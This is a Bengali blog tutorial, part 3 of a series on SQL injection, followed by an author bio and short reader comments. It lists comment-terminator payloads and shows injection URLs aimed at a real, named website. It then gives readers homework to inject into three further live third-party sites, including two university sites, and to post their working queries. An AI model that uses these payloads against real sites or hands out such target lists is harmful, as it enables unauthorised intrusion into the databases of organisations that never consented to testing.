Sqli শিখুন ধাপে ধাপে [পর্ব-৩]

 

আবার ও ফিরে এলাম Sqli এর ৩য় Tutorial নিয়ে যারা ১ ও ২য় Tutorial দেখেন নি তাদের কিছু প্রব্লেম হতে পারে তাই আগে পূর্বের টিউন গুলা দেখে আসেন ।

যাই হোক কথা না বাড়িয়ে কাজে আশি। ২য় ধাপ এর পরের ধাপ নিম্নরুপ :

 

  • এর পরবর্তী কাজ হচ্ছে এটাকে fixed করা,
  • প্রথমে আমরা special character দিয়ে দেখলাম যে database response করে কি না, দেখলাম করে, এখন এটাকে fixed করে দেবো, কারণ fixed করলে এর পরবর্তী বা পরের যে কোন query সে নাকচ করে দেয়। তার মানে এবার সুধু আমরা জা request দেব database তার এ উত্তর দিবে।
  • যাহোক, fixed korar system,
  • নিচের লাইনটা ভাল করে পরেন
  • special charecter er পরে এক্তি space দিয়ে তারপর জা জা দেয়া লাগবে fixed করার জন্য,
  • --+, #, %23, -- -,   --space, ;%00, %603,    (যে কোন একটা আর কি)
  • নিচের লাইনটা ভাল করে পরেন
  • কখনো আবার fixed করার জন্য special character তুলে দিয়ে করতে হবে। এটা site দেখে করতে হয়।
  • যেমন,
  • http://eyot.co.in/product.php?id=37' --+
  • http://eyot.co.in/product.php?id=37 --+ (removed special charecter) এটা প্রত্যেকটার ক্ষেত্রেই হতে পারে।
  • http://eyot.co.in/product.php?id=37" --+
  • http://eyot.co.in/product.php?id=37 --+
  • http://eyot.co.in/product.php?id=37' %23
  • http://eyot.co.in/product.php?id=37' -- -
  • http://eyot.co.in/product.php?id=37' #
  • http://eyot.co.in/product.php?id=37') --+ / # / %23 /  / -- -/ ;%00
  • continued....

এবারে নিচের তিনটা লিঙ্কের error গুলা fixed করে, আপনার URL বা query টা টিউমেন্ট korun .

কারটা কেও দেখে করবেন না, কারণ পরে test a fail korben, ar test e fail korle janen e to remove..

somossa nei na bujhle koment korun .

ar mone rakhben ekhon jodi thik thak fixed na korte paren tobe, samne step hobe na 😀

http://www.thelaureate.edu.pk/contents.php?id=10
http://www.bzu.edu.pk/departmentindex.php?id=48
http://www.australianpaddlesurfer.com.au/articleMenu.php?filter=interview

Tune Full Credit : Mahadi Talukder

ফেসবুক পেইজ ঃ http://www.facebook.com/innominate.bangladesh

Facebook Group : https://www.facebook.com/groups/1060843833941377

ফেসবুকে আমি ঃ http://www.facebook.com/100004445461825 (Mysterious Coder)

আমার পেইজ ঃ http://www.facebook.com/rhs.bangladesh

Level 0

আমি রাজীব হাসান শাওন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 8 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 6 টি টিউন ও 5 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

Ager tune ar link den !

Level 0

ভাই সব বুঝলাম কিন্তুুু SQL error page Fix করব কেনও …??

এবং আপনি সব টিউনে SQLI লিকচেন কেন সেটাও বুজলাম না…??

অ্যাটাক টার নাম তো SQL Injection……

And thanks for this chain tune of SQL Injectin… 😀

    Sql Error Page Fix করতে হবে তাই করবেন :p । হুম ভাই Sqli হল Sql Injection এর Short Form । আপনাকে ধন্যবাদ